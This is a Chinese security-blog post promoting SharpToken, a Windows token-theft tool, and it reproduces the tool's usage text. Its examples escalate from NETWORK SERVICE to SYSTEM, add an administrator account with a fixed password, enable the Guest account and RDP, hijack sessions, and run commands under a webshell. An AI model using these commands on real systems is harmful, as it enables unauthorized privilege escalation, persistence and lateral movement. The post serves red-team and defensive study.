提权神器！Windows令牌窃取专家

ivi

BeichenDream Hack分享吧 2023-05-06 08:30 发表于新加坡

声明：该公众号分享的安全工具和项目均来源于网络，仅供安全研究与学习之用，如用于其他用途，由使用者承担全部法律及连带责任，与工具作者和本公众号无关。

工具介绍

在红队横向移动的过程中，我们经常需要窃取其他用户的权限。在现代 EDR 的防御下，我们很难使用 Mimikatz 获取其他用户的权限，如果目标用户没有活着的进程，我们也没有办法使用“OpenProcessToken”来窃取 Token。

SharpToken 是一种利用令牌泄漏的工具，它可以从系统中的所有进程中找到泄漏的令牌并使用它们，如果你是低权限服务用户，你甚至可以用它升级到“NT AUTHORITY\SYSTEM”权限，无需目标用户的密码就可以切换到目标用户的桌面做更多的事情。

工具用法

1. SharpToken By BeichenDream
   
2. =========================================================
   
3. 
   
4. Github : https://github.com/BeichenDream/SharpToken
   
5. 
   
6. If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
   
7. e.g.
   
8. SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
   
9. 
   
10. Usage:
    
11. SharpToken COMMAND arguments
    
12. 
    
13. COMMANDS:
    
14.         list_token [process pid]        [bypass]
    
15.         list_all_token [process pid] [bypass]
    
16.         add_user    <username> <password> [group] [domain] [bypass]
    
17.         enableUser <username> <NewPassword> [NewGroup] [bypass]
    
18.         delete_user <username> [domain] [bypass]
    
19.         execute <tokenUser> <commandLine> [Interactive] [bypass]
    
20.         enableRDP [bypass]
    
21.         tscon <targetSessionId> [sourceSessionId] [bypass]
    
22. 
    
23. example:
    
24.     SharpToken list_token
    
25.     SharpToken list_token bypass
    
26.     SharpToken list_token 6543
    
27.     SharpToken add_user admin Abcd1234! Administrators
    
28.     SharpToken enableUser Guest Abcd1234! Administrators
    
29.     SharpToken delete_user admin
    
30.     SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    
31.     SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
    
32.     SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
    
33.     SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
    
34.     SharpToken tscon 1

复制代码

提升权限

除了通常的Token窃取权限增强，SharpToken还支持通过Bypass获取完整的Token。

如果你是NT AUTHORITY/NETWORK SERVICE用户，你添加了bypass参数，SharpToken会从RPCSS窃取System，即无条件的NT AUTHORITY\NETWORK SERVICE到NT AUTHORITY\SYSTEM

ListToken

枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle（Duplicate后Token的句柄）、TargetProcessId（Token产生的进程）、TargetProcessToken（源进程中Token的句柄）、Groups（Token用户所在的组）位于）

1. SharpToken list_token

复制代码

枚举来自指定进程的令牌

1. SharpToken list_token 468

复制代码

获取交互式shell

1. execute "NT AUTHORITY\SYSTEM" cmd true

复制代码

获取命令执行结果（在webshell下执行）

1. SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

复制代码